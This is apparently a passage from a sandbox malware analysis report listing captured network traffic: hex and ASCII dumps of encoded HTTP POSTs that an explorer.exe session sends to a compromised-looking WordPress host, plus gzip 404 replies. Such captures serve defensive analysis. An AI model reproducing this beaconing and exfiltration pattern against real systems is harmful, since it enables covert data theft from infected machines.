                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 75 34 68 51 4a 64 38 2d 39 54 56 5a 68 79 4b 2d 33 72 7e 65 45 2d 58 73 71 58 4a 44 4e 68 62 39 41 35 73 68 58 6d 28 6a 67 4c 6b 4b 61 64 49 32 6f 6a 35 38 68 48 49 70 68 53 72 4a 34 42 41 77 70 47 6b 6a 75 71 7e 5a 51 5a 45 31 79 6b 36 42 6e 37 78 6d 4f 38 44 4f 6b 33 6b 36 51 6c 67 52 30 45 67 38 7a 37 59 4f 7a 54 75 7a 6d 36 45 79 66 72 44 39 4d 63 70 34 48 46 61 74 45 4d 4f 53 47 38 4a 4f 47 57 42 71 53 51 66 59 65 4d 30 34 32 48 71 50 59 32 44 48 37 4d 44 61 34 4d 63 2d 53 70 74 70 7e 63 74 4d 51 72 6c 4f 75 49 72 64 66 55 4e 65 36 30 32 61 54 4d 79 75 7a 54 28 39 4a 33 54 45 70 31 78 71 62 79 44 74 28 52 70 6f 5a 34 7e 48 63 38 52 64 52 6d 34 57 4d 39 4a 69 61 7a 30 4d 43 50 6f 33 6a 39 42 77 7e 61 77 56 76 53 6d 55 6f 36 52 7a 32 2d 67 54 53 46 37 46 72 71 57 51 55 46 72 6d 43 44 54 30 34 41 36 64 28 44 31 6a 54 47 36 4a 65 4c 6a 4d 41 59 4a 59 31 6c 37 63 67 7a 62 74 4c 47 67 72 51 30 63 76 43 44 68 6a 32 68 57 62 4c 42 72 2d 6d 45 4a 44 70 4b 4c 65 73 50 66 48 38 4c 74 55 4a 66 71 70 33 61 4b 6e 42 4a 49 68 28 4f 66 6a 48 55 7e 50 75 50 66 69 44 4f 34 52 73 49 43 45 34 64 63 49 4f 51 51 57 4d 48 54 62 31 78 5a 46 4e 63 72 33 37 72 4b 53 7a 35 41 4e 53 58 37 7a 46 66 6e 36 6b 59 33 64 58 77 51 53 6e 7a 7a 51 63 59 62 57 4d 77 62 58 28 77 6c 33 57 35 6c 63 76 53 35 35 51 79 43 31 5a 77 6a 54 64 43 48 5f 4d 55 48 56 6d 70 62 6e 43 53 70 6e 39 48 55 63 36 33 43 61 4e 53 4e 46 4b 54 53 34 77 42 66 73 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hu4hQJd8-9TVZhyK-3r~eE-XsqXJDNhb9A5shXm(jgLkKadI2oj58hHIphSrJ4BAwpGkjuq~ZQZE1yk6Bn7xmO8DOk3k6QlgR0Eg8z7YOzTuzm6EyfrD9Mcp4HFatEMOSG8JOGWBqSQfYeM042HqPY2DH7MDa4Mc-Sptp~ctMQrlOuIrdfUNe602aTMyuzT(9J3TEp1xqbyDt(RpoZ4~Hc8RdRm4WM9Jiaz0MCPo3j9Bw~awVvSmUo6Rz2-gTSF7FrqWQUFrmCDT04A6d(D1jTG6JeLjMAYJY1l7cgzbtLGgrQ0cvCDhj2hWbLBr-mEJDpKLesPfH8LtUJfqp3aKnBJIh(OfjHU~PuPfiDO4RsICE4dcIOQQWMHTb1xZFNcr37rKSz5ANSX7zFfn6kY3dXwQSnzzQcYbWMwbX(wl3W5lcvS55QyC1ZwjTdCH_MUHVmpbnCSpn9HUc63CaNSNFKTS4wBfso.
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304507971 CET628INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:20:44 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 13045
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                                    Data Ascii: rksg1\- "c+;OR&0`bto$_;Uwo"gzW^O}}? pwoIF9S/N`LzX`r}^O;h<!d$J`/osO'A38c\*HS',6 1-/uNg&kkZP&5H/qM_d(^#$1\;ETKw?5`tXnD&ZTk|+:J!v?~9w~I8?Ef>Wz,|9,^PrJ(M)iyUd'_d?=EA.5B8jB3M`[\df2$>n]e5ZF'iw(O`dhIy*\-gycs[L&[/peYP{(0 ;~;?y;W\$5M4N,Iq3/8}N qR/HTG68REn]^mfwS)/,-vwgHg&kkm4cab2a&%&I)r^$2NI\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304596901 CET629INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f be d7 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                                    Data Ascii: PKTK?e%,{RXE~|'q)suBFD<uomZe~{:<MC5^dUQ,@f~h8LNx!,0ho!95oFTvb"t(@M]&.CS~s{a%IF.zy%W+6lcmre~=DV
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304622889 CET631INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba df 44 48 6b e9 7e d0 03
                                                                                                                                                                                    Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$EDHk~oLo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304646015 CET632INData Raw: 2c 70 7b 0c 52 1e 97 90 b6 2c ab 78 e3 20 e8 bb 69 af f6 40 59 f6 c8 2a 32 66 dc b0 40 96 62 59 cc 96 55 73 86 f6 28 8c 82 3f 0a a6 20 76 ad d3 d6 92 98 db e9 2c a7 71 cc 44 b2 f0 78 29 72 d3 6b 6f 5e 97 14 17 96 ab d6 0c 89 a6 c0 92 d4 94 10 1f
                                                                                                                                                                                    Data Ascii: ,p{R,x i@Y*2f@bYUs(? v,qDx)rko^iSD3(2,5=*E4gr&*P.a#Qc)Dq@b})99CD@{jTujCb6S=-9gHrzH`Auvu*B6BDB=t6vtM/8()
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304693937 CET633INData Raw: d7 3e d9 90 72 82 29 5d af 79 64 53 6e 7b 93 14 14 ec 7b 4c a3 10 53 59 18 77 c4 e1 fa e0 26 a1 b9 1d a8 6b 73 42 19 4f c9 4a 86 9c 90 21 f1 28 67 89 e0 30 32 37 18 a1 68 61 7b 3e cb 50 4f 26 5c 26 38 c3 b5 6b 43 15 be 34 ef 84 41 c4 38 ca a3 e0
                                                                                                                                                                                    Data Ascii: >r)]ydSn{{LSYw&ksBOJ!(g027ha{>PO&\&8kC4A8%Hk4@P7ue#0<aY.bl~~$6"IWj]/.Xmf!];aI{dLNrrpr28ppl`+Z6p}3GN{~\f =R
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304864883 CET635INData Raw: ca ca 1f 3e a2 87 17 9c 86 87 af 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 df d2 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d
                                                                                                                                                                                    Data Ascii: >Euu1^(ejKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD~i`Z3m0Xi?;T{F24~_PY<H@i{BSR.e/"rS^s)b0+Ja{?13_9HS->B%ic
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304882050 CET636INData Raw: 5a ef 91 0c 62 46 07 7b 94 f3 3d e2 0f 77 fb 9c 89 2b 82 3b 19 ec 69 74 3a e8 14 c0 ec 11 16 0f f6 c6 13 37 a6 ea ca 0d b9 8c ae dc f2 d5 2d 21 52 05 a3 c1 5e 6a 4c de f3 7d 25 a7 94 1b 88 d2 84 cb 90 72 2f 92 99 3f c9 dd 48 0a 03 c2 f8 26 85 0c
                                                                                                                                                                                    Data Ascii: ZbF{=w+;it:7-!R^jL}%r/?H&_cTk02KX/@7=R%`"W;,w|CRm3/Y(J,z8Bp7&&?DG@*bwrTs9pvK)rk Jmd2x4
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304894924 CET637INData Raw: e3 a3 ee e7 f7 b7 77 8c b8 9d e3 66 b7 ec d3 c6 8e ad 15 0e 4b 38 cf 36 e0 04 75 47 7f 8d 3a 73 c9 d0 34 40 98 68 0d 9c 0b 59 a8 08 be 57 34 4f 59 e4 10 99 83 a2 46 aa 81 c3 44 0d 53 8a 87 87 ca 32 d6 d6 c3 3e 7e 91 eb 8c 0b ec 97 1a 93 f7 7c 7f
                                                                                                                                                                                    Data Ascii: wfK86uG:s4@hYW4OYFDS2>~|2x'UM3<VC&,6iiX8QgD^Lqfs#rpPK^8#FGSgDA"jj23!*UbFlNmmi+;`
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304908037 CET639INData Raw: f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 0c 7f 90 19 f4 7d 8a 3b e0 6c b8 bb 86 d6 d1 e3 b4 72 a9 cd a5 3d dd 67 96 d3 64 39 8a 68 5b f1 f2 69 28 0b e3 16 da 77 86 cf ec 91 fc a2 37 b2 3c fe ac 2c 8f b7 64 19 49 61 68 54 f3 3c af 2e 8f 31
                                                                                                                                                                                    Data Ascii: |_)42d};lr=gd9h[i(w7<,dIahT<.1=LOd1h</H^|#2WlL)VpMJ"?WsX/8c63OTG7,oGA22:!AH!O.c.mtbD5Q4}636r\E"c6{h
                                                                                                                                                                                    Nov 21, 2022 19:20:44.304924011 CET640INData Raw: 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 5e d1 cf 40 aa 53 8a 95 2b c6 3f 1d ab 5d b1 42 87 df c5 42 d7 f6 7d 5d fa 19 2f 7d 1d 29 96 1b 62 a6 39 1a dd c0 b5 f1 df d3 31 ad a2 ce 70 d7 ff 1b e9 3f f9 ed fc db 67 6f 9f fd 46 fe e6 ef
                                                                                                                                                                                    Data Ascii: ;`YCUP>k^@S+?]BB}]/})b91p?goFYr3J2 0/8>q,6CvwfxDyJEyATs@'#^`lMC;Jl`B~}hCK1K0
                                                                                                                                                                                    Nov 21, 2022 19:20:44.418644905 CET641INData Raw: 2e 9f e5 67 a1 db 74 86 b8 83 52 f0 99 de 93 c9 c4 1b 4f d0 14 19 e8 52 ec ea e8 8f 14 80 1b 53 75 e5 4e a4 8a 73 05 5a bb e5 93 4f 0c 55 09 98 c1 de 65 c8 a9 b8 da 1b 7e 8b 59 e4 57 cc fa d9 66 91 b7 36 ab 54 ff f9 94 fc fd d7 f2 8a db c8 ef 73
                                                                                                                                                                                    Data Ascii: .gtRORSuNsZOUe~YWf6Tstq(6&#r)*%'.-s|\@hk;c| {X,;._~eGdrC4%cZE"LT.v1Q7>SE\P2 7f~Q


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    13192.168.11.2049836192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:20:46.192378998 CET647OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.royaltechglobal.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 6d 34 68 69 42 64 39 5a 52 54 61 35 68 79 4a 2d 33 71 7e 65 45 5a 58 6f 4f 54 4a 44 51 63 62 5f 49 35 74 32 7a 6d 28 51 49 4c 79 61 61 41 48 57 6f 68 6f 73 67 45 49 70 39 4f 72 4a 39 38 48 44 31 47 6c 67 32 71 70 65 45 65 48 6c 79 59 36 42 6e 33 6d 32 4f 30 44 50 51 6e 6b 36 4d 6c 67 53 41 45 76 76 62 37 61 64 62 54 30 7a 6d 35 52 69 65 72 4e 64 4e 6b 70 34 44 52 61 74 45 79 4f 51 71 38 4a 4f 6d 57 43 74 7e 58 52 59 65 4d 33 34 32 49 75 50 45 36 44 47 58 45 44 61 4d 4d 63 2d 36 70 74 4a 7e 63 6f 74 51 73 78 2d 75 4b 76 64 65 63 65 4f 6d 43 32 61 58 69 79 76 48 54 7e 4e 64 33 53 7a 46 31 39 76 37 79 64 64 28 50 6d 49 5a 6e 78 6e 63 67 52 62 78 51 34 57 73 4c 4a 6c 61 7a 30 74 69 50 75 53 50 2d 43 51 7e 63 28 31 76 48 77 6b 6b 32 52 77 66 6e 67 54 54 65 37 45 66 71 57 6a 63 46 73 6a 69 41 51 6b 34 48 76 4e 28 53 37 44 66 32 36 4a 44 47 6a 4e 6f 79 4a 62 5a 6c 37 38 67 7a 4c 63 4c 42 71 62 51 7a 44 66 43 64 7e 7a 32 50 57 62 48 33 72 5f 79 2d 4a 54 46 4b 4e 75 38 50 49 6e 38 49 72 30 4a 62 77 5a 32 51 4f 6e 42 4a 49 68 7a 77 66 69 37 55 7e 64 75 50 4f 43 7a 4f 39 43 45 49 46 30 34 62 63 49 50 65 51 57 77 4b 54 62 4e 66 5a 45 38 4a 72 78 6a 72 4c 48 66 35 42 4f 4b 55 72 7a 45 30 6a 36 6b 4c 7a 64 54 6a 51 53 72 72 7a 51 4d 49 62 6b 49 77 61 58 76 77 68 33 57 36 33 4d 76 56 70 5a 51 6f 50 56 46 57 6a 54 42 38 48 5f 4a 4a 48 58 6d 70 65 47 6a 57 35 6d 31 4e 41 75 69 42 4d 4e 6b 62 44 33 71 69 44 34 55 79 42 72 62 56 38 65 36 6b 55 61 49 30 37 47 68 61 46 58 4b 6f 49 48 57 72 58 44 37 62 54 6e 65 57 54 34 42 76 66 57 46 76 79 42 75 73 50 4d 64 74 57 53 44 42 38 6c 48 32 56 46 6c 74 7e 67 42 75 59 70 6e 53 7a 46 72 68 47 38 76 43 54 72 36 50 66 33 76 36 4a 30 76 39 69 41 32 37 39 6f 33 56 57 54 4e 4f 64 72 6a 43 34 72 64 6d 55 47 30 38 4d 59 4b 76 73 75 51 48 6e 30 74 39 35 2d 45 38 57 51 45 5a 5a 39 6b 48 45 6f 41 6e 56 68 54 73 56 6e 69 52 37 37 72 45 58 42 45 56 4a 52 65 76 52 63 4c 33 58 61 58 31 39 4a 39 4e 36 53 4e 4f 74 6a 38 68 71 2d 4f 38 5a 64 6d 48 38 4c 79 59 4b 73 77 76 4a 50 61 72 46 73 45 50 6f 64 37 44 71 6c 58 73 36 6e 4d 38 39 77 45 4a 62 6a 36 36 77 42 61 33 49 4c 37 73 35 34 4b 66 71 36 4b 69 31 32 73 37 63 31 74 55 73 51 51 4c 48 4c 4e 71 36 67 7a 61 43 4c 66 55 39 6d 4e 45 75 45 52 55 5a 5a 4e 50 30 76 36 73 32 50 43 46 51 55 59 41 63 6c 36 4e 58 65 6a 41 4b 67 34 72 75 42 63 34 50 51 28 37 36 45 59 52 41 39 56 65 36 66 34 58 49 4a 74 56 48 34 7a 6f 55 37 61 49 28 39 76 4d 28 39 34 72 71 2d 49 70 65 72 42 6d 50 7a 31 4d 4b 65 54 67 71 68 62 76 55 64 31 38 4b 46 71 79 4e 52 64 51 46 6a 76 50 4e 7a 47 56 44 32 36 32 45 30 48 7a 32 5a 75 49 30 43 37 64 63 41 4b 49 78 68 30 56 30 53 55 77 6c 58 78 4d 36 42 6c 75 33 48 4a 51 7e 33 71 76 72 46 4a 32 50 73 4f 51 4b 56 4b 45 38 54 69 33 57 62 46 48 74 39 58 52 7a 2d 39 33 79 2d 6c 6e 75 46 30 4e 63 64 54 64 47 6c 4e 78 55 5a 32 49 76 58 74 66 4f 58 28 4d 28 62 70 61 66 76 32 35 39 64 57 79 4e 45 70 62 68 77 63 68 54 5f 28 74 43 72 4a 35 67 44 36 47 42 37 67 4c 44 2d 4f 5f 73 4c 72 37 65 4f 39 43 56 52 5a 37 36 4c 69 67 52 31 46 43 4f 53 59 56 48 71 75 59 54 38 58 5a 32 39 42 72 42 58 47 42 4a 30 34 30 48 47 77 4b 6a 5f 47 52 45 6b 70 63 5a 53 28 56 6f 6e 7a 66 6f 4e 39 55 7e 6a 79 6f 6f 42 62 5f 54 6a 4a 67 63 77 62 77 30 7a 63 68 7a 5a 73 41 73 65 74 2d 71 34 59 79 7e 33 65 41 72 48 6b 56 51 76 6a 65 45 4c 76 4f 71 68 47 4c 6a 4b 50 45 4c 35 73 37 67 30 47 6f 6d 2d 51 4d 66 44 50 38 41 51 6d 67 73 4b 66 51 6f 36 32 65 68 76 7e 75 56 43 7a 77 58 55 62 68 6a 78 69 68 6a 67 6e 6f 5a 58 4f 31 79 31 6a 43 4a 43 4d 46 5a 55 7a 71 52 39 71 6f 4f 42 37 32 53 59 4e 62 6d 69 47 56 38 33 7a 36 43 52 48 6e 62 58 4e 47 51 54 4e 37 4f 48 76 6a 70 58 31 55 61 76 30 31 48 30 55 64 28 4d 77 6e 76 6e 39 47 30 45 57 6d 64 33 47 35 33 59 44 50 41 63 34 51 73 4a 4f 34 30 55 48 45 77 69 53 56 43 44 37 68 61 42 77 76 4e 70 36 45 31 58 49 6e 71 73 72 36 50 6a 61 44 69 61 59 56 6f 4b 75 71 79 77 39 50 7e 63 31 7a 6e 37 4a 69 31 4a 46 75 58
                                                                                                                                                                                    Data Ascii: r4txB=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hm4hiBd9ZRTa5hyJ-3q~eEZXoOTJDQcb_I5t2zm(QILyaaAHWohosgEIp9OrJ98HD1Glg2qpeEeHlyY6Bn3m2O0DPQnk6MlgSAEvvb7adbT0zm5RierNdNkp4DRatEyOQq8JOmWCt~XRYeM342IuPE6DGXEDaMMc-6ptJ~cotQsx-uKvdeceOmC2aXiyvHT~Nd3SzF19v7ydd(PmIZnxncgRbxQ4WsLJlaz0tiPuSP-CQ~c(1vHwkk2RwfngTTe7EfqWjcFsjiAQk4HvN(S7Df26JDGjNoyJbZl78gzLcLBqbQzDfCd~z2PWbH3r_y-JTFKNu8PIn8Ir0JbwZ2QOnBJIhzwfi7U~duPOCzO9CEIF04bcIPeQWwKTbNfZE8JrxjrLHf5BOKUrzE0j6kLzdTjQSrrzQMIbkIwaXvwh3W63MvVpZQoPVFWjTB8H_JJHXmpeGjW5m1NAuiBMNkbD3qiD4UyBrbV8e6kUaI07GhaFXKoIHWrXD7bTneWT4BvfWFvyBusPMdtWSDB8lH2VFlt~gBuYpnSzFrhG8vCTr6Pf3v6J0v9iA279o3VWTNOdrjC4rdmUG08MYKvsuQHn0t95-E8WQEZZ9kHEoAnVhTsVniR77rEXBEVJRevRcL3XaX19J9N6SNOtj8hq-O8ZdmH8LyYKswvJParFsEPod7DqlXs6nM89wEJbj66wBa3IL7s54Kfq6Ki12s7c1tUsQQLHLNq6gzaCLfU9mNEuERUZZNP0v6s2PCFQUYAcl6NXejAKg4ruBc4PQ(76EYRA9Ve6f4XIJtVH4zoU7aI(9vM(94rq-IperBmPz1MKeTgqhbvUd18KFqyNRdQFjvPNzGVD262E0Hz2ZuI0C7dcAKIxh0V0SUwlXxM6Blu3HJQ~3qvrFJ2PsOQKVKE8Ti3WbFHt9XRz-93y-lnuF0NcdTdGlNxUZ2IvXtfOX(M(bpafv259dWyNEpbhwchT_(tCrJ5gD6GB7gLD-O_sLr7eO9CVRZ76LigR1FCOSYVHquYT8XZ29BrBXGBJ040HGwKj_GREkpcZS(VonzfoN9U~jyooBb_TjJgcwbw0zchzZsAset-q4Yy~3eArHkVQvjeELvOqhGLjKPEL5s7g0Gom-QMfDP8AQmgsKfQo62ehv~uVCzwXUbhjxihjgnoZXO1y1jCJCMFZUzqR9qoOB72SYNbmiGV83z6CRHnbXNGQTN7OHvjpX1Uav01H0Ud(Mwnvn9G0EWmd3G53YDPAc4QsJO40UHEwiSVCD7haBwvNp6E1XInqsr6PjaDiaYVoKuqyw9P~c1zn7Ji1JFuXIxkCnk1E9qSQU5c911oQ_RtGZge4UnWli~FUKNzEj38xueZnPN_iqr3ABEfQVVDSkosJTWILNFxdELG9NuObvpLBRKHsit8H9iI2iRPkNmScMT-O_WiE-RSLn35c0hc2-g5AdLPYszRMIMYOQn6lLysCm~qKKf_iwYCIDBNb9ONSoweWeiMgfExifGxRJNUKvhtU3qad1LgygiIJP~bLe00q6fWcAAxffaByh2NftaIIwO3l78rAznFtAiz24s-GerDpIvDViAMfOlrXw4mBZ8J(36E16~chqXZCLXc9exgYPxAac1qX3eNbPN02L0WGSUxJZSLUNVTVaenttuxzp~Xb9Nph6zy0av9EtwvF8nB8-mstN4WXYzknH21WjIpxrqihLhMcG3-6owcWuGFp7KzIVfheGjFWfaP~KGR4fvJ(xf9UzrJ2W(1PMv5Tle9eOHnh0ff7Ban(p3bAC~oNcU3p_Cv2w9lqElV(_4pfJlSe-qY7HSJbxEL3pFe4j1rVIwZutC6KKMcA5PGsf743_cywZZU2h~rQrqlqOjFDHi2uezk2w0T8ejeHiJyh88keJV0NulXIR7mXv7R68Gl246kaFy3Clf8M3VB5wqWAkWXuuzsQSpwxLOe7AdCJ-0Dx3FdHNsa1zpnBEKUy4SzW19vH7zHB5QUiH~fgzfWflgKjxxLlW6i42VXoF0mp2UHp6wOflIVpX0FYxk1bLXF~NVj(cX_oc32WwUr1VLb6OGOdvD4oxYHTWKYFEZvyC8F9gcVhh0ol_OlGZT1uy62TzUM4rWuA-KNm43qgCXlfN8RaztLThpXWA806o6NdwRTFX6WgzNMAoXACI~emCUDojGSeL3XyK97UD4-RxrsOJQABWuhabl37ZsLvnGin10LlrcvD9GW8IQ4A14Z1PeG76aSy8uDw5XodYaepbhfCMk_~nmDVE~AqqXNgXp60Ukwhxy1bdMnRjvw3uH_Kb(JRadaGh9nCHlA4nTJ5cA-zkTe6HqNSU4kF1f2p_E3vwRdFws37lmxXDmyDH7a(e0F7Vl5t5PS1GrD8m9QUwoun5IE4ID3KprR7TDq(UGIo-0WIqWKXVKwII89Dw924G~qA32QfCzRzra2dUkWYgGErwC_C5j8HNAWQjU-M6ONR_m-2JAiit0NU1zazbvsvczn6Hw7u1(mm_M_tMJvbmcrBA5uVs0Amxip~fSFtZ74PHomX4ueC2un(F1A4PvYQwD8xEBA8Xu_K4OPAOSPbwBi2-qp6mYa(i1QSqbJhxECDtsIJgVSVcm5sYxkXhGy4FrxF2fOzpInUV0zl6B-DF5DMV9lFJnsu0QnkCAc1It2syNGDQUcFm~sJ1UYswHrnHwSEf1lundys3siJI136-YBAx0hneHUGow7kRzXCFEjfsnYyZlwCAh7vb(epivaRIP5Mxf3(rJTtUS9ulw3l0~O6i(bOPGgg4Rwry9ixOLqOIu1pRl6CBUlJIUbgDIn7TI60FFjY9Yh~lOAIy42xSzRGpzExiUhKWmUg-XE6es8kHlYOLHP8cKF6TDXIRwu9xg_aKVoPFOsZdXUabi-HhLQTvcLFTDCDc95vXc9vTGt(zDHblvl0E5Xs2a0INHu94tAe788xTrBW35HsNBaU5AgPc8ybio8K62UYqUzuspuObO4qXGOe9omjektJpyvDEvFDCTnodEQoM(sLT87Z-3C4aMoO6yxauhiZP8fLiengjGcZIcLxGAU5GUaCbf-u0~9tTzrY6pIVygsDSINzH8Y0MxL0R70Ao2Qzdo0eSEDfgA7z0LtHZS5q93N1lA7duty8RuzEmTqCMfcYdiAdzUVfUhgpFWTbLeE(sz_FfQo0qwYpvb3Yi0ruRepdiUnTIWjgD9DxwrtdgoiwSEeCK5EDZME7ST7jJ0lGOD6fr3yUP4YTjblSQ~XuVzyq4m3mOk0Cxy-4YNV52yD7N9tpIWRjxifUYR-LFSv5cy7MnTOWErUkTXHHqR14XJFFxsntdMI2NgHBpr3(cj73-zUMDCd9-I_Tza7cIkXlpdwUQHziDwgbDykjIl6N72KTEp66UfyLO(z7BPhoy(-(1OCWGQwGZx6PPXaA1(WmHmZPR3SDDg75xVRlbJYQLNEnKgjwHQr